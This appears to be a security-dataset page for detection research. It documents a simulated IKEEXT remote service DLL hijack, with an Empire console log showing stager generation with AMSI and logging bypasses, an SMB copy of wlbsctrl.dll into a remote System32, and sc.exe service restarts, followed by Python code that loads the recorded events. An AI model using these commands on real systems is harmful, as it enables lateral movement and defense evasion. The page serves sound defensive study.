IKEEXT Remote Service DLL Hijack#

Metadata#

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/04/03

Modification Date

2020/09/20

Tactics

TA0003,TA0004,TA0005

Techniques

T1574.001

Tags

Remote Service DLL Hijacking,RPC over SMB Svcctl

Dataset Description#

This dataset represents adversaries copying a file remotely to replace a file which is executed by a service that is vulnerable to DLL hijack. This dataset includes

Simulation Metadata#

Tools#

type

Name

Module

C2

Empire

manual

Adversary View#

(Empire: agents) > usestager windows/dll
(Empire: stager/windows/dll) > info
Name: DLL Launcher

Description:
  Generate a PowerPick Reflective DLL to inject with
  stager code.

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  Listener         True        http              Listener to use.
  Language         True        powershell        Language of the stager to generate.
  Arch             True        x64               Architecture of the .dll to generate
                                                (x64 or x86).
  StagerRetries    False       0                 Times for the stager to retry
                                                connecting.
  UserAgent        False       default           User-agent string to use for the staging
                                                request (default, none, or other).
  Proxy            False       default           Proxy to use for request (default, none,
                                                or other).
  ProxyCreds       False       default           Proxy credentials
                                                ([domain\]username:password) to use for
                                                request (default, none, or other).
  OutFile          True        /tmp/wlbsctrl.dll File to output dll to.
  Obfuscate        False       False             Switch. Obfuscate the launcher
                                                powershell code, uses the
                                                ObfuscateCommand for obfuscation types.
                                                For powershell only.
  ObfuscateCommand False       Token\All\1       The Invoke-Obfuscation command to use.
                                                Only used if Obfuscate switch is True.
                                                For powershell only.
  AMSIBypass       False       True              Include mattifestation's AMSI Bypass in
                                                the stager code.
  AMSIBypass2      False       False             Include Tal Liberman's AMSI Bypass in
                                                the stager code.
  ScriptLogBypass  False       True              Include cobbr's Script Block Log Bypass
                                                in the stager code.
  ETWBypass        False       False             Include tandasat's ETW bypass in the
                                                stager code.

(Empire: stager/windows/dll) > back
(Empire: agents) > agents

[*] Active agents:

  Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
  ----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
  GCSKD17Z ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         1112   5/0.0    2020-09-22 03:51:02  http            

(Empire: agents) > interact GCSKD17Z
(Empire: GCSKD17Z) >
(Empire: GCSKD17Z) > upload /tmp/wlbsctrl.dll
[*] Tasked agent to upload wlbsctrl.dll, 124 KB
(Empire: GCSKD17Z) > shell COPY .\wlbsctrl.dll \\WORKSTATION6\C$\Windows\System32\wlbsctrl.dll
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 3
(Empire: GCSKD17Z) > 
..Command execution completed.

(Empire: GCSKD17Z) > shell sc.exe `\`\WORKSTATION6 stop IKEEXT
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 4
(Empire: GCSKD17Z) > 
SERVICE_NAME: IKEEXT 
        TYPE               : 30  WIN32  
        STATE              : 3  STOP_PENDING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x1388

..Command execution completed.

(Empire: GCSKD17Z) > shell sc.exe `\`\WORKSTATION6 query IKEEXT
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 5
(Empire: GCSKD17Z) > 
SERVICE_NAME: IKEEXT 
        TYPE               : 20  WIN32_SHARE_PROCESS  
        STATE              : 1  STOPPED 
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

..Command execution completed.

(Empire: GCSKD17Z) > shell sc.exe `\`\WORKSTATION6 start IKEEXT
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 6
(Empire: GCSKD17Z) > 
SERVICE_NAME: IKEEXT 
        TYPE               : 30  WIN32  
        STATE              : 2  START_PENDING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 6172
        FLAGS              : 

..Command execution completed.

(Empire: GCSKD17Z) >

Explore Datasets#

Download & Decompress Dataset#

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_shell_dcerpc_smb_service_dll_hijack.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File#

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events#

df.groupby(['Channel']).size().sort_values(ascending=False)